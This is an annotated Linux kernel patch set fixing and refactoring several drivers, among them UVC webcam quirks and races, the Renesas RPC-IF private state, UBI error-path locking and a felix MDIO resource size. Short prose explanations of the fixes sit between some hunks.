+ 	  .bInterfaceSubClass	= 1,
+ 	  .bInterfaceProtocol	= 0,
+ 	  .driver_info		= (kernel_ulong_t)&uvc_quirk_probe_minmax },
++	/* Logitech, Webcam C910 */
++	{ .match_flags		= USB_DEVICE_ID_MATCH_DEVICE
++				| USB_DEVICE_ID_MATCH_INT_INFO,
++	  .idVendor		= 0x046d,
++	  .idProduct		= 0x0821,
++	  .bInterfaceClass	= USB_CLASS_VIDEO,
++	  .bInterfaceSubClass	= 1,
++	  .bInterfaceProtocol	= 0,
++	  .driver_info		= UVC_INFO_QUIRK(UVC_QUIRK_WAKE_AUTOSUSPEND)},
++	/* Logitech, Webcam B910 */
++	{ .match_flags		= USB_DEVICE_ID_MATCH_DEVICE
++				| USB_DEVICE_ID_MATCH_INT_INFO,
++	  .idVendor		= 0x046d,
++	  .idProduct		= 0x0823,
++	  .bInterfaceClass	= USB_CLASS_VIDEO,
++	  .bInterfaceSubClass	= 1,
++	  .bInterfaceProtocol	= 0,
++	  .driver_info		= UVC_INFO_QUIRK(UVC_QUIRK_WAKE_AUTOSUSPEND)},
+ 	/* Logitech Quickcam Fusion */
+ 	{ .match_flags		= USB_DEVICE_ID_MATCH_DEVICE
+ 				| USB_DEVICE_ID_MATCH_INT_INFO,
+diff --git a/drivers/media/usb/uvc/uvc_entity.c b/drivers/media/usb/uvc/uvc_entity.c
+index 7c4d2f93d3513..cc68dd24eb42d 100644
+--- a/drivers/media/usb/uvc/uvc_entity.c
++++ b/drivers/media/usb/uvc/uvc_entity.c
+@@ -37,7 +37,7 @@ static int uvc_mc_create_links(struct uvc_video_chain *chain,
+ 			continue;
+ 
+ 		remote = uvc_entity_by_id(chain->dev, entity->baSourceID[i]);
+-		if (remote == NULL)
++		if (remote == NULL || remote->num_pads == 0)
+ 			return -EINVAL;
+ 
+ 		source = (UVC_ENTITY_TYPE(remote) == UVC_TT_STREAMING)
+diff --git a/drivers/media/usb/uvc/uvc_status.c b/drivers/media/usb/uvc/uvc_status.c
+index 7518ffce22edb..4a92c989cf335 100644
+--- a/drivers/media/usb/uvc/uvc_status.c
++++ b/drivers/media/usb/uvc/uvc_status.c
+@@ -6,6 +6,7 @@
+  *          Laurent Pinchart (laurent.pinchart@ideasonboard.com)
+  */
+ 
++#include <asm/barrier.h>
+ #include <linux/kernel.h>
+ #include <linux/input.h>
+ #include <linux/slab.h>
+@@ -309,5 +310,41 @@ int uvc_status_start(struct uvc_device *dev, gfp_t flags)
+ 
+ void uvc_status_stop(struct uvc_device *dev)
+ {
++	struct uvc_ctrl_work *w = &dev->async_ctrl;
++
++	/*
++	 * Prevent the asynchronous control handler from requeing the URB. The
++	 * barrier is needed so the flush_status change is visible to other
++	 * CPUs running the asynchronous handler before usb_kill_urb() is
++	 * called below.
++	 */
++	smp_store_release(&dev->flush_status, true);
++
++	/*
++	 * Cancel any pending asynchronous work. If any status event was queued,
++	 * process it synchronously.
++	 */
++	if (cancel_work_sync(&w->work))
++		uvc_ctrl_status_event(w->chain, w->ctrl, w->data);
++
++	/* Kill the urb. */
+ 	usb_kill_urb(dev->int_urb);
++
++	/*
++	 * The URB completion handler may have queued asynchronous work. This
++	 * won't resubmit the URB as flush_status is set, but it needs to be
++	 * cancelled before returning or it could then race with a future
++	 * uvc_status_start() call.
++	 */
++	if (cancel_work_sync(&w->work))
++		uvc_ctrl_status_event(w->chain, w->ctrl, w->data);
++
++	/*
++	 * From this point, there are no events on the queue and the status URB
++	 * is dead. No events will be queued until uvc_status_start() is called.
++	 * The barrier is needed to make sure that flush_status is visible to
++	 * uvc_ctrl_status_event_work() when uvc_status_start() will be called
++	 * again.
++	 */
++	smp_store_release(&dev->flush_status, false);
+ }
+diff --git a/drivers/media/usb/uvc/uvc_v4l2.c b/drivers/media/usb/uvc/uvc_v4l2.c
+index 0774a11360c03..950b42d78a107 100644
+--- a/drivers/media/usb/uvc/uvc_v4l2.c
++++ b/drivers/media/usb/uvc/uvc_v4l2.c
+@@ -661,8 +661,6 @@ static int uvc_ioctl_enum_fmt(struct uvc_streaming *stream,
+ 	fmt->flags = 0;
+ 	if (format->flags & UVC_FMT_FLAG_COMPRESSED)
+ 		fmt->flags |= V4L2_FMT_FLAG_COMPRESSED;
+-	strscpy(fmt->description, format->name, sizeof(fmt->description));
+-	fmt->description[sizeof(fmt->description) - 1] = 0;
+ 	fmt->pixelformat = format->fcc;
+ 	return 0;
+ }
+diff --git a/drivers/media/usb/uvc/uvc_video.c b/drivers/media/usb/uvc/uvc_video.c
+index d2eb9066e4dcc..0d3a3b697b2d8 100644
+--- a/drivers/media/usb/uvc/uvc_video.c
++++ b/drivers/media/usb/uvc/uvc_video.c
+@@ -1352,7 +1352,9 @@ static void uvc_video_decode_meta(struct uvc_streaming *stream,
+ 	if (has_scr)
+ 		memcpy(stream->clock.last_scr, scr, 6);
+ 
+-	memcpy(&meta->length, mem, length);
++	meta->length = mem[0];
++	meta->flags  = mem[1];
++	memcpy(meta->buf, &mem[2], length - 2);
+ 	meta_buf->bytesused += length + sizeof(meta->ns) + sizeof(meta->sof);
+ 
+ 	uvc_dbg(stream->dev, FRAME,
+@@ -1965,6 +1967,17 @@ static int uvc_video_start_transfer(struct uvc_streaming *stream,
+ 			"Selecting alternate setting %u (%u B/frame bandwidth)\n",
+ 			altsetting, best_psize);
+ 
++		/*
++		 * Some devices, namely the Logitech C910 and B910, are unable
++		 * to recover from a USB autosuspend, unless the alternate
++		 * setting of the streaming interface is toggled.
++		 */
++		if (stream->dev->quirks & UVC_QUIRK_WAKE_AUTOSUSPEND) {
++			usb_set_interface(stream->dev->udev, intfnum,
++					  altsetting);
++			usb_set_interface(stream->dev->udev, intfnum, 0);
++		}
++
+ 		ret = usb_set_interface(stream->dev->udev, intfnum, altsetting);
+ 		if (ret < 0)
+ 			return ret;
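
The decode_meta hunk above replaces one field-spanning memcpy() with per-member stores. The reason is bounds checking: a fortified memcpy() that starts at &meta->length and runs for `length` bytes crosses from one struct member into the next, which FORTIFY_SOURCE flags at run time. The destination layout (from the uvcvideo UAPI header, reproduced from memory, so treat the comments as illustrative) shows why the split form copies the same bytes while each store stays inside a single member:

  struct uvc_meta_buf {
  	__u64 ns;	/* host timestamp, written elsewhere */
  	__u16 sof;	/* USB start-of-frame counter */
  	__u8  length;	/* = mem[0] */
  	__u8  flags;	/* = mem[1] */
  	__u8  buf[];	/* memcpy(meta->buf, &mem[2], length - 2) */
  } __packed;
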
+diff --git a/drivers/media/usb/uvc/uvcvideo.h b/drivers/media/usb/uvc/uvcvideo.h
+index 1227ae63f85b7..33e7475d4e64a 100644
+--- a/drivers/media/usb/uvc/uvcvideo.h
++++ b/drivers/media/usb/uvc/uvcvideo.h
+@@ -74,6 +74,7 @@
+ #define UVC_QUIRK_RESTORE_CTRLS_ON_INIT	0x00000400
+ #define UVC_QUIRK_FORCE_Y8		0x00000800
+ #define UVC_QUIRK_FORCE_BPP		0x00001000
++#define UVC_QUIRK_WAKE_AUTOSUSPEND	0x00002000
+ 
+ /* Format flags */
+ #define UVC_FMT_FLAG_COMPRESSED		0x00000001
+@@ -264,8 +265,6 @@ struct uvc_format {
+ 	u32 fcc;
+ 	u32 flags;
+ 
+-	char name[32];
+-
+ 	unsigned int nframes;
+ 	struct uvc_frame *frame;
+ };
+@@ -559,6 +558,7 @@ struct uvc_device {
+ 	/* Status Interrupt Endpoint */
+ 	struct usb_host_endpoint *int_ep;
+ 	struct urb *int_urb;
++	bool flush_status;
+ 	u8 *status;
+ 	struct input_dev *input;
+ 	char input_phys[64];
+diff --git a/drivers/memory/renesas-rpc-if.c b/drivers/memory/renesas-rpc-if.c
+index 09cd4318a83d8..5be3b46cd55f1 100644
+--- a/drivers/memory/renesas-rpc-if.c
++++ b/drivers/memory/renesas-rpc-if.c
+@@ -163,14 +163,36 @@ static const struct regmap_access_table rpcif_volatile_table = {
+ 	.n_yes_ranges	= ARRAY_SIZE(rpcif_volatile_ranges),
+ };
+ 
++struct rpcif_priv {
++	struct device *dev;
++	void __iomem *base;
++	void __iomem *dirmap;
++	struct regmap *regmap;
++	struct reset_control *rstc;
++	struct platform_device *vdev;
++	size_t size;
++	enum rpcif_type type;
++	enum rpcif_data_dir dir;
++	u8 bus_size;
++	u8 xfer_size;
++	void *buffer;
++	u32 xferlen;
++	u32 smcr;
++	u32 smadr;
++	u32 command;		/* DRCMR or SMCMR */
++	u32 option;		/* DROPR or SMOPR */
++	u32 enable;		/* DRENR or SMENR */
++	u32 dummy;		/* DRDMCR or SMDMCR */
++	u32 ddr;		/* DRDRENR or SMDRENR */
++};
+ 
+ /*
+  * Custom accessor functions to ensure SM[RW]DR[01] are always accessed with
+- * proper width.  Requires rpcif.xfer_size to be correctly set before!
++ * proper width.  Requires rpcif_priv.xfer_size to be correctly set before!
+  */
+ static int rpcif_reg_read(void *context, unsigned int reg, unsigned int *val)
+ {
+-	struct rpcif *rpc = context;
++	struct rpcif_priv *rpc = context;
+ 
+ 	switch (reg) {
+ 	case RPCIF_SMRDR0:
+@@ -206,7 +228,7 @@ static int rpcif_reg_read(void *context, unsigned int reg, unsigned int *val)
+ 
+ static int rpcif_reg_write(void *context, unsigned int reg, unsigned int val)
+ {
+-	struct rpcif *rpc = context;
++	struct rpcif_priv *rpc = context;
+ 
+ 	switch (reg) {
+ 	case RPCIF_SMWDR0:
+@@ -253,39 +275,18 @@ static const struct regmap_config rpcif_regmap_config = {
+ 	.volatile_table	= &rpcif_volatile_table,
+ };
+ 
+-int rpcif_sw_init(struct rpcif *rpc, struct device *dev)
++int rpcif_sw_init(struct rpcif *rpcif, struct device *dev)
+ {
+-	struct platform_device *pdev = to_platform_device(dev);
+-	struct resource *res;
++	struct rpcif_priv *rpc = dev_get_drvdata(dev);
+ 
+-	rpc->dev = dev;
+-
+-	rpc->base = devm_platform_ioremap_resource_byname(pdev, "regs");
+-	if (IS_ERR(rpc->base))
+-		return PTR_ERR(rpc->base);
+-
+-	rpc->regmap = devm_regmap_init(&pdev->dev, NULL, rpc, &rpcif_regmap_config);
+-	if (IS_ERR(rpc->regmap)) {
+-		dev_err(&pdev->dev,
+-			"failed to init regmap for rpcif, error %ld\n",
+-			PTR_ERR(rpc->regmap));
+-		return	PTR_ERR(rpc->regmap);
+-	}
+-
+-	res = platform_get_resource_byname(pdev, IORESOURCE_MEM, "dirmap");
+-	rpc->dirmap = devm_ioremap_resource(&pdev->dev, res);
+-	if (IS_ERR(rpc->dirmap))
+-		return PTR_ERR(rpc->dirmap);
+-	rpc->size = resource_size(res);
+-
+-	rpc->type = (uintptr_t)of_device_get_match_data(dev);
+-	rpc->rstc = devm_reset_control_get_exclusive(&pdev->dev, NULL);
+-
+-	return PTR_ERR_OR_ZERO(rpc->rstc);
++	rpcif->dev = dev;
++	rpcif->dirmap = rpc->dirmap;
++	rpcif->size = rpc->size;
++	return 0;
+ }
+ EXPORT_SYMBOL(rpcif_sw_init);
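
With the driver state moved into rpcif_priv, rpcif_sw_init() shrinks to copying the three fields a flash child driver actually needs. A hedged sketch of how a consumer (e.g. a SPI or HyperBus child) would call it; the function and variable names here are illustrative, not taken from the patch:

  static int example_flash_probe(struct platform_device *pdev)
  {
  	struct rpcif *rpc;
  	int ret;

  	rpc = devm_kzalloc(&pdev->dev, sizeof(*rpc), GFP_KERNEL);
  	if (!rpc)
  		return -ENOMEM;

  	/* The child sits under the rpc-if platform device, whose
  	 * drvdata now holds the private struct rpcif_priv. */
  	ret = rpcif_sw_init(rpc, pdev->dev.parent);
  	if (ret)
  		return ret;

  	/* rpc->dev, rpc->dirmap and rpc->size are now usable. */
  	return 0;
  }
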
+ 
+-static void rpcif_rzg2l_timing_adjust_sdr(struct rpcif *rpc)
++static void rpcif_rzg2l_timing_adjust_sdr(struct rpcif_priv *rpc)
+ {
+ 	regmap_write(rpc->regmap, RPCIF_PHYWR, 0xa5390000);
+ 	regmap_write(rpc->regmap, RPCIF_PHYADD, 0x80000000);
+@@ -299,8 +300,9 @@ static void rpcif_rzg2l_timing_adjust_sdr(struct rpcif *rpc)
+ 	regmap_write(rpc->regmap, RPCIF_PHYADD, 0x80000032);
+ }
+ 
+-int rpcif_hw_init(struct rpcif *rpc, bool hyperflash)
++int rpcif_hw_init(struct rpcif *rpcif, bool hyperflash)
+ {
++	struct rpcif_priv *rpc = dev_get_drvdata(rpcif->dev);
+ 	u32 dummy;
+ 
+ 	pm_runtime_get_sync(rpc->dev);
+@@ -364,7 +366,7 @@ int rpcif_hw_init(struct rpcif *rpc, bool hyperflash)
+ }
+ EXPORT_SYMBOL(rpcif_hw_init);
+ 
+-static int wait_msg_xfer_end(struct rpcif *rpc)
++static int wait_msg_xfer_end(struct rpcif_priv *rpc)
+ {
+ 	u32 sts;
+ 
+@@ -373,7 +375,7 @@ static int wait_msg_xfer_end(struct rpcif *rpc)
+ 					USEC_PER_SEC);
+ }
+ 
+-static u8 rpcif_bits_set(struct rpcif *rpc, u32 nbytes)
++static u8 rpcif_bits_set(struct rpcif_priv *rpc, u32 nbytes)
+ {
+ 	if (rpc->bus_size == 2)
+ 		nbytes /= 2;
+@@ -386,9 +388,11 @@ static u8 rpcif_bit_size(u8 buswidth)
+ 	return buswidth > 4 ? 2 : ilog2(buswidth);
+ }
+ 
+-void rpcif_prepare(struct rpcif *rpc, const struct rpcif_op *op, u64 *offs,
++void rpcif_prepare(struct rpcif *rpcif, const struct rpcif_op *op, u64 *offs,
+ 		   size_t *len)
+ {
++	struct rpcif_priv *rpc = dev_get_drvdata(rpcif->dev);
++
+ 	rpc->smcr = 0;
+ 	rpc->smadr = 0;
+ 	rpc->enable = 0;
+@@ -472,8 +476,9 @@ void rpcif_prepare(struct rpcif *rpc, const struct rpcif_op *op, u64 *offs,
+ }
+ EXPORT_SYMBOL(rpcif_prepare);
+ 
+-int rpcif_manual_xfer(struct rpcif *rpc)
++int rpcif_manual_xfer(struct rpcif *rpcif)
+ {
++	struct rpcif_priv *rpc = dev_get_drvdata(rpcif->dev);
+ 	u32 smenr, smcr, pos = 0, max = rpc->bus_size == 2 ? 8 : 4;
+ 	int ret = 0;
+ 
+@@ -593,7 +598,7 @@ exit:
+ err_out:
+ 	if (reset_control_reset(rpc->rstc))
+ 		dev_err(rpc->dev, "Failed to reset HW\n");
+-	rpcif_hw_init(rpc, rpc->bus_size == 2);
++	rpcif_hw_init(rpcif, rpc->bus_size == 2);
+ 	goto exit;
+ }
+ EXPORT_SYMBOL(rpcif_manual_xfer);
+@@ -640,8 +645,9 @@ static void memcpy_fromio_readw(void *to,
+ 	}
+ }
+ 
+-ssize_t rpcif_dirmap_read(struct rpcif *rpc, u64 offs, size_t len, void *buf)
++ssize_t rpcif_dirmap_read(struct rpcif *rpcif, u64 offs, size_t len, void *buf)
+ {
++	struct rpcif_priv *rpc = dev_get_drvdata(rpcif->dev);
+ 	loff_t from = offs & (rpc->size - 1);
+ 	size_t size = rpc->size - from;
+ 
+@@ -674,8 +680,11 @@ EXPORT_SYMBOL(rpcif_dirmap_read);
+ 
+ static int rpcif_probe(struct platform_device *pdev)
+ {
++	struct device *dev = &pdev->dev;
+ 	struct platform_device *vdev;
+ 	struct device_node *flash;
++	struct rpcif_priv *rpc;
++	struct resource *res;
+ 	const char *name;
+ 	int ret;
+ 
+@@ -696,11 +705,40 @@ static int rpcif_probe(struct platform_device *pdev)
+ 	}
+ 	of_node_put(flash);
+ 
++	rpc = devm_kzalloc(&pdev->dev, sizeof(*rpc), GFP_KERNEL);
++	if (!rpc)
++		return -ENOMEM;
++
++	rpc->base = devm_platform_ioremap_resource_byname(pdev, "regs");
++	if (IS_ERR(rpc->base))
++		return PTR_ERR(rpc->base);
++
++	rpc->regmap = devm_regmap_init(dev, NULL, rpc, &rpcif_regmap_config);
++	if (IS_ERR(rpc->regmap)) {
++		dev_err(dev, "failed to init regmap for rpcif, error %ld\n",
++			PTR_ERR(rpc->regmap));
++		return	PTR_ERR(rpc->regmap);
++	}
++
++	res = platform_get_resource_byname(pdev, IORESOURCE_MEM, "dirmap");
++	rpc->dirmap = devm_ioremap_resource(dev, res);
++	if (IS_ERR(rpc->dirmap))
++		return PTR_ERR(rpc->dirmap);
++	rpc->size = resource_size(res);
++
++	rpc->type = (uintptr_t)of_device_get_match_data(dev);
++	rpc->rstc = devm_reset_control_get_exclusive(dev, NULL);
++	if (IS_ERR(rpc->rstc))
++		return PTR_ERR(rpc->rstc);
++
+ 	vdev = platform_device_alloc(name, pdev->id);
+ 	if (!vdev)
+ 		return -ENOMEM;
+ 	vdev->dev.parent = &pdev->dev;
+-	platform_set_drvdata(pdev, vdev);
++
++	rpc->dev = &pdev->dev;
++	rpc->vdev = vdev;
++	platform_set_drvdata(pdev, rpc);
+ 
+ 	ret = platform_device_add(vdev);
+ 	if (ret) {
+@@ -713,9 +751,9 @@ static int rpcif_probe(struct platform_device *pdev)
+ 
+ static int rpcif_remove(struct platform_device *pdev)
+ {
+-	struct platform_device *vdev = platform_get_drvdata(pdev);
++	struct rpcif_priv *rpc = platform_get_drvdata(pdev);
+ 
+-	platform_device_unregister(vdev);
++	platform_device_unregister(rpc->vdev);
+ 
+ 	return 0;
+ }
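
The shape of the refactoring, condensed: probe publishes the private state through drvdata, and every exported helper recovers it from the public handle's device pointer, so struct rpcif keeps only what consumers need. A two-line sketch of the round trip:

  platform_set_drvdata(pdev, rpc);		/* probe: struct rpcif_priv * */
  rpc = dev_get_drvdata(rpcif->dev);	/* each exported helper */
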
+diff --git a/drivers/mfd/arizona-core.c b/drivers/mfd/arizona-core.c
+index bd7ee3260d53f..c166fcd331f11 100644
+--- a/drivers/mfd/arizona-core.c
++++ b/drivers/mfd/arizona-core.c
+@@ -45,7 +45,7 @@ int arizona_clk32k_enable(struct arizona *arizona)
+ 	if (arizona->clk32k_ref == 1) {
+ 		switch (arizona->pdata.clk32k_src) {
+ 		case ARIZONA_32KZ_MCLK1:
+-			ret = pm_runtime_get_sync(arizona->dev);
++			ret = pm_runtime_resume_and_get(arizona->dev);
+ 			if (ret != 0)
+ 				goto err_ref;
+ 			ret = clk_prepare_enable(arizona->mclk[ARIZONA_MCLK1]);
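
Two things make pm_runtime_resume_and_get() the better fit here. pm_runtime_get_sync() returns 1 when the device was already active, so the `ret != 0` test above used to treat a success case as an error; and on failure it still leaves the usage count raised, which callers had to undo by hand. A sketch of the difference, using a generic dev rather than the arizona-specific code:

  /* Old pattern: must drop the count on failure, and 1 means success. */
  ret = pm_runtime_get_sync(dev);
  if (ret < 0) {
  	pm_runtime_put_noidle(dev);	/* easy to forget -> refcount leak */
  	return ret;
  }

  /* New helper: returns 0 or a negative error, count already balanced. */
  ret = pm_runtime_resume_and_get(dev);
  if (ret)
  	return ret;
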
+diff --git a/drivers/misc/mei/bus-fixup.c b/drivers/misc/mei/bus-fixup.c
+index 6df7679d97391..92c0930cc742c 100644
+--- a/drivers/misc/mei/bus-fixup.c
++++ b/drivers/misc/mei/bus-fixup.c
+@@ -151,7 +151,7 @@ static int mei_fwver(struct mei_cl_device *cldev)
+ 	ret = __mei_cl_send(cldev->cl, (u8 *)&req, sizeof(req), 0,
+ 			    MEI_CL_IO_TX_BLOCKING);
+ 	if (ret < 0) {
+-		dev_err(&cldev->dev, "Could not send ReqFWVersion cmd\n");
++		dev_err(&cldev->dev, "Could not send ReqFWVersion cmd ret = %d\n", ret);
+ 		return ret;
+ 	}
+ 
+@@ -163,7 +163,7 @@ static int mei_fwver(struct mei_cl_device *cldev)
+ 		 * Should be at least one version block,
+ 		 * error out if nothing found
+ 		 */
+-		dev_err(&cldev->dev, "Could not read FW version\n");
++		dev_err(&cldev->dev, "Could not read FW version ret = %d\n", bytes_recv);
+ 		return -EIO;
+ 	}
+ 
+@@ -380,7 +380,7 @@ static int mei_nfc_if_version(struct mei_cl *cl,
+ 	ret = __mei_cl_send(cl, (u8 *)&cmd, sizeof(cmd), 0,
+ 			    MEI_CL_IO_TX_BLOCKING);
+ 	if (ret < 0) {
+-		dev_err(bus->dev, "Could not send IF version cmd\n");
++		dev_err(bus->dev, "Could not send IF version cmd ret = %d\n", ret);
+ 		return ret;
+ 	}
+ 
+@@ -395,7 +395,7 @@ static int mei_nfc_if_version(struct mei_cl *cl,
+ 	bytes_recv = __mei_cl_recv(cl, (u8 *)reply, if_version_length, &vtag,
+ 				   0, 0);
+ 	if (bytes_recv < 0 || (size_t)bytes_recv < if_version_length) {
+-		dev_err(bus->dev, "Could not read IF version\n");
++		dev_err(bus->dev, "Could not read IF version ret = %d\n", bytes_recv);
+ 		ret = -EIO;
+ 		goto err;
+ 	}
+diff --git a/drivers/misc/vmw_balloon.c b/drivers/misc/vmw_balloon.c
+index 61a2be712bf7b..9ce9b9e0e9b63 100644
+--- a/drivers/misc/vmw_balloon.c
++++ b/drivers/misc/vmw_balloon.c
+@@ -1709,7 +1709,7 @@ static void __init vmballoon_debugfs_init(struct vmballoon *b)
+ static void __exit vmballoon_debugfs_exit(struct vmballoon *b)
+ {
+ 	static_key_disable(&balloon_stat_enabled.key);
+-	debugfs_remove(debugfs_lookup("vmmemctl", NULL));
++	debugfs_lookup_and_remove("vmmemctl", NULL);
+ 	kfree(b->stats);
+ 	b->stats = NULL;
+ }
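
debugfs_lookup() takes a reference on the dentry it returns, and debugfs_remove() never drops it, so the old one-liner leaked a dentry on every module exit. debugfs_lookup_and_remove() bundles the lookup, the removal and the dput(). A roughly equivalent open-coded form, for illustration:

  struct dentry *d = debugfs_lookup("vmmemctl", NULL);
  if (d) {
  	debugfs_remove(d);
  	dput(d);	/* the reference debugfs_lookup() took */
  }
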
+diff --git a/drivers/mtd/ubi/build.c b/drivers/mtd/ubi/build.c
+index a901f8edfa41d..7f65af1697519 100644
+--- a/drivers/mtd/ubi/build.c
++++ b/drivers/mtd/ubi/build.c
+@@ -468,6 +468,7 @@ static int uif_init(struct ubi_device *ubi)
+ 			err = ubi_add_volume(ubi, ubi->volumes[i]);
+ 			if (err) {
+ 				ubi_err(ubi, "cannot add volume %d", i);
++				ubi->volumes[i] = NULL;
+ 				goto out_volumes;
+ 			}
+ 		}
+@@ -663,6 +664,12 @@ static int io_init(struct ubi_device *ubi, int max_beb_per1024)
+ 	ubi->ec_hdr_alsize = ALIGN(UBI_EC_HDR_SIZE, ubi->hdrs_min_io_size);
+ 	ubi->vid_hdr_alsize = ALIGN(UBI_VID_HDR_SIZE, ubi->hdrs_min_io_size);
+ 
++	if (ubi->vid_hdr_offset && ((ubi->vid_hdr_offset + UBI_VID_HDR_SIZE) >
++	    ubi->vid_hdr_alsize)) {
++		ubi_err(ubi, "VID header offset %d too large.", ubi->vid_hdr_offset);
++		return -EINVAL;
++	}
++
+ 	dbg_gen("min_io_size      %d", ubi->min_io_size);
+ 	dbg_gen("max_write_size   %d", ubi->max_write_size);
+ 	dbg_gen("hdrs_min_io_size %d", ubi->hdrs_min_io_size);
+diff --git a/drivers/mtd/ubi/fastmap-wl.c b/drivers/mtd/ubi/fastmap-wl.c
+index 0ee452275578d..863f571f1adb5 100644
+--- a/drivers/mtd/ubi/fastmap-wl.c
++++ b/drivers/mtd/ubi/fastmap-wl.c
+@@ -146,13 +146,15 @@ void ubi_refill_pools(struct ubi_device *ubi)
+ 	if (ubi->fm_anchor) {
+ 		wl_tree_add(ubi->fm_anchor, &ubi->free);
+ 		ubi->free_count++;
++		ubi->fm_anchor = NULL;
+ 	}
+ 
+-	/*
+-	 * All available PEBs are in ubi->free, now is the time to get
+-	 * the best anchor PEBs.
+-	 */
+-	ubi->fm_anchor = ubi_wl_get_fm_peb(ubi, 1);
++	if (!ubi->fm_disabled)
++		/*
++		 * All available PEBs are in ubi->free, now is the time to get
++		 * the best anchor PEBs.
++		 */
++		ubi->fm_anchor = ubi_wl_get_fm_peb(ubi, 1);
+ 
+ 	for (;;) {
+ 		enough = 0;
+diff --git a/drivers/mtd/ubi/vmt.c b/drivers/mtd/ubi/vmt.c
+index 8fcc0bdf06358..2c867d16f89f7 100644
+--- a/drivers/mtd/ubi/vmt.c
++++ b/drivers/mtd/ubi/vmt.c
+@@ -464,7 +464,7 @@ int ubi_resize_volume(struct ubi_volume_desc *desc, int reserved_pebs)
+ 		for (i = 0; i < -pebs; i++) {
+ 			err = ubi_eba_unmap_leb(ubi, vol, reserved_pebs + i);
+ 			if (err)
+-				goto out_acc;
++				goto out_free;
+ 		}
+ 		spin_lock(&ubi->volumes_lock);
+ 		ubi->rsvd_pebs += pebs;
+@@ -512,8 +512,10 @@ out_acc:
+ 		ubi->avail_pebs += pebs;
+ 		spin_unlock(&ubi->volumes_lock);
+ 	}
++	return err;
++
+ out_free:
+-	kfree(new_eba_tbl);
++	ubi_eba_destroy_table(new_eba_tbl);
+ 	return err;
+ }
+ 
+@@ -580,6 +582,7 @@ int ubi_add_volume(struct ubi_device *ubi, struct ubi_volume *vol)
+ 	if (err) {
+ 		ubi_err(ubi, "cannot add character device for volume %d, error %d",
+ 			vol_id, err);
++		vol_release(&vol->dev);
+ 		return err;
+ 	}
+ 
+@@ -590,15 +593,14 @@ int ubi_add_volume(struct ubi_device *ubi, struct ubi_volume *vol)
+ 	vol->dev.groups = volume_dev_groups;
+ 	dev_set_name(&vol->dev, "%s_%d", ubi->ubi_name, vol->vol_id);
+ 	err = device_register(&vol->dev);
+-	if (err)
+-		goto out_cdev;
++	if (err) {
++		cdev_del(&vol->cdev);
++		put_device(&vol->dev);
++		return err;
++	}
+ 
+ 	self_check_volumes(ubi);
+ 	return err;
+-
+-out_cdev:
+-	cdev_del(&vol->cdev);
+-	return err;
+ }
+ 
+ /**
+diff --git a/drivers/mtd/ubi/wl.c b/drivers/mtd/ubi/wl.c
+index 68eb0f21b3fe2..9e14319225c97 100644
+--- a/drivers/mtd/ubi/wl.c
++++ b/drivers/mtd/ubi/wl.c
+@@ -890,8 +890,11 @@ static int wear_leveling_worker(struct ubi_device *ubi, struct ubi_work *wrk,
+ 
+ 	err = do_sync_erase(ubi, e1, vol_id, lnum, 0);
+ 	if (err) {
+-		if (e2)
++		if (e2) {
++			spin_lock(&ubi->wl_lock);
+ 			wl_entry_destroy(ubi, e2);
++			spin_unlock(&ubi->wl_lock);
++		}
+ 		goto out_ro;
+ 	}
+ 
+@@ -973,11 +976,11 @@ out_error:
+ 	spin_lock(&ubi->wl_lock);
+ 	ubi->move_from = ubi->move_to = NULL;
+ 	ubi->move_to_put = ubi->wl_scheduled = 0;
++	wl_entry_destroy(ubi, e1);
++	wl_entry_destroy(ubi, e2);
+ 	spin_unlock(&ubi->wl_lock);
+ 
+ 	ubi_free_vid_buf(vidb);
+-	wl_entry_destroy(ubi, e1);
+-	wl_entry_destroy(ubi, e2);
+ 
+ out_ro:
+ 	ubi_ro_mode(ubi);
+@@ -1130,14 +1133,18 @@ static int __erase_worker(struct ubi_device *ubi, struct ubi_work *wl_wrk)
+ 		/* Re-schedule the LEB for erasure */
+ 		err1 = schedule_erase(ubi, e, vol_id, lnum, 0, false);
+ 		if (err1) {
++			spin_lock(&ubi->wl_lock);
+ 			wl_entry_destroy(ubi, e);
++			spin_unlock(&ubi->wl_lock);
+ 			err = err1;
+ 			goto out_ro;
+ 		}
+ 		return err;
+ 	}
+ 
++	spin_lock(&ubi->wl_lock);
+ 	wl_entry_destroy(ubi, e);
++	spin_unlock(&ubi->wl_lock);
+ 	if (err != -EIO)
+ 		/*
+ 		 * If this is not %-EIO, we have no idea what to do. Scheduling
+@@ -1253,6 +1260,18 @@ int ubi_wl_put_peb(struct ubi_device *ubi, int vol_id, int lnum,
+ retry:
+ 	spin_lock(&ubi->wl_lock);
+ 	e = ubi->lookuptbl[pnum];
++	if (!e) {
++		/*
++		 * This wl entry has been removed due to an error by another
++		 * process (e.g. the wear-leveling worker). That process
++		 * (any except __erase_worker, which cannot run concurrently
++		 * with ubi_wl_put_peb) will have set ubi ro_mode at the same
++		 * time, so just ignore this wl entry.
++		 */
++		spin_unlock(&ubi->wl_lock);
++		up_read(&ubi->fm_protect);
++		return 0;
++	}
+ 	if (e == ubi->move_from) {
+ 		/*
+ 		 * User is putting the physical eraseblock which was selected to
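
Taken together, the wl.c hunks establish one invariant: wl_entry_destroy() on an entry that is still reachable through ubi->lookuptbl must run under wl_lock, so that a concurrent lookup either finds the entry or finds NULL, never a freed pointer. The pattern, condensed into a sketch:

  /* destroyer */
  spin_lock(&ubi->wl_lock);
  wl_entry_destroy(ubi, e);	/* also clears ubi->lookuptbl[e->pnum] */
  spin_unlock(&ubi->wl_lock);

  /* concurrent reader, e.g. ubi_wl_put_peb() */
  spin_lock(&ubi->wl_lock);
  e = ubi->lookuptbl[pnum];
  if (!e) {			/* destroyed by the other path */
  	spin_unlock(&ubi->wl_lock);
  	return 0;
  }
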
+diff --git a/drivers/net/dsa/ocelot/felix_vsc9959.c b/drivers/net/dsa/ocelot/felix_vsc9959.c
+index 01ac70fd7ddf1..4b6e4e5b47283 100644
+--- a/drivers/net/dsa/ocelot/felix_vsc9959.c
++++ b/drivers/net/dsa/ocelot/felix_vsc9959.c
+@@ -513,7 +513,7 @@ static const char * const vsc9959_resource_names[TARGET_MAX] = {
+  * SGMII/QSGMII MAC PCS can be found.
+  */
+ static const struct resource vsc9959_imdio_res =
+-	DEFINE_RES_MEM_NAMED(0x8030, 0x8040, "imdio");
++	DEFINE_RES_MEM_NAMED(0x8030, 0x10, "imdio");
+ 
+ static const struct reg_field vsc9959_regfields[REGFIELD_MAX] = {
+ 	[ANA_ADVLEARN_VLAN_CHK] = REG_FIELD(ANA_ADVLEARN, 6, 6),
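
DEFINE_RES_MEM_NAMED(start, size, name) takes a length as its second argument, not an end address; with 0x8040 the resource claimed 0x8030..0x1006f. The internal MDIO registers occupy only 16 bytes:

  /* before: a 0x8040-byte window starting at 0x8030 */
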